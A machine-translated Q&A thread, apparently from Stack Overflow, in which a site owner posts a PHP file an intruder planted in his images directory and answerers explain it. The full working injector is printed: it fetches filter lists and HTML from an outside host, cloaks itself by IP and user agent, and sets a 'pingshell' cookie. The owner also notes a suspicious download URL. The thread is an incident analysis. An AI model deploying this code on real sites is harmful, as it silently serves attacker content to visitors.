2010-12-01 40 views
7

編輯:迄今爲止工作良好。我剛剛被黑客入侵,但我不知道爲何如此重要。非常奇怪的代碼注入

我剛剛發現了這個幸福的下載,在我的bash的歷史跑:

http://notsoft.ru/glib

(安全瀏覽)

感謝所有


我剛注意到我的網站的源php已被編輯。我不知道如何(自從我改變了所有密碼),但真正讓我困惑的是爲什麼。

在幾頁中放置了一個iframe,鏈接到一個xml.php文件,該文件放置在我的images目錄中(HTACCESS唯一可以訪問的目錄),因爲頁面相當複雜並沒有制動這些頁面自動地方本來幾乎是不可能的。

現在真的令人困惑的事情是這樣的XML.php文件的內容,因爲從我可以看到它什麼都不做。

這裏的代碼:

<?php 

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's 
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code 
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file 

if(isset($_GET['ping'])){ 
    echo "Status: Ping successful!"; die; 
} 
$ip = $_SERVER['REMOTE_ADDR']; 
//orezaem do deapozona 
$exIps = explode(".", $ip); 

$ip = $exIps[0].".".$exIps[1].".".$exIps[2]; 

$ips = file_get_contents($urlIps); 

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process.. 
    die; 
} 

$arrUa = file($urlUa); 
for($ua=0; $ua<count($arrUa); $ua++){ 
    $userAgent = trim($arrUa[$ua]); 
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process.. 
     die; 
    } 
} 


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki 

    echo @file_get_contents($urlHtml); 

}else{ 

?> 
<SCRIPT LANGUAGE="JavaScript"> 
function setCookie (name, value, expires, path, domain, secure) { 
     document.cookie = name + "=" + escape(value) + 
    ((expires) ? "; expires=" + expires : "") + 
    ((path) ? "; path=" + path : "") + 
    ((domain) ? "; domain=" + domain : "") + 
    ((secure) ? "; secure" : ""); 
} 
</SCRIPT> 

<SCRIPT LANGUAGE="JavaScript"> 
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/"); 
</SCRIPT> 
<meta http-equiv="refresh" content="2; url="> 

<?php 
} 
?> 

我錯過了什麼,還是這是最奇怪的「黑客」?我已經完成了我的搜索,並找不到任何參考。

+1

你是什麼意思,它什麼也不做?這段代碼做了一些事情,它使用`file_get_contents`獲取了一些頁面,它輸出了一些東西(一些`echo`,甚至一些js的cookie),它使得瀏覽器刷新... – cambraca 2010-12-01 20:56:44

+0

但是該文件檢索的URL是好像空着。 – Jon 2010-12-01 20:59:25

+2

我很想知道那些評論的意思是什麼...... – Jonah 2010-12-01 21:01:02

回答

5

它的功能如下。

  1. 檢查是否腳本與ping稱爲如果它是它回覆並終止
  2. 下載總數有效的服務器的IP和檢查的列表請求來自一個人來,如果終止不是。
  3. 下載用戶代理字符串列表,並將瀏覽器與這些字符串進行匹配,以查看它是否有效,如果不是,則終止。
  4. 如果cookie pingshell先前已經設定,則HTML文件被下載,併爲整個域顯示在瀏覽器
  5. 否則一個cookie腳本發送回瀏覽器時,pingshell的cookie設置爲虛值,有效。

第4步是重要的一點,它看起來像一個代理服務器來檢索給定位置的HTML。如果鏈接是非法的,那就不好。雖然可能出於營銷目的,但他們可以使用您的網址來提供其內容並獲得用戶的點擊數據。

說了代碼只允許來自規定的IP地址的任何形式的訪問,所以除非他們首先捕獲該信息,似乎它是專門爲特定人員使用而設計的。

0

看起來他們想用你的網站來擴大他們的cookie跟蹤系統。 Status: ping successful事情看起來像一個函數,讓他們定期檢查他們的黑客的完整性。它還將所有訪問者的IP地址發送到他們的服務器。

2

看起來像自動腳本的一部分。這將用於確認自動攻擊是否成功,並列出要返回的地點列表。除其他事項外。 (約拿勒布朗帶來了一些其他的東西)

編輯

你可以做的是腸道中的代碼和監控到一個日誌文件的調用。看看有人試圖用它做什麼。

1

確保您已在php.ini中啓用安全模式,以避免此類腳本打開遠程不安全的文件..

相關問題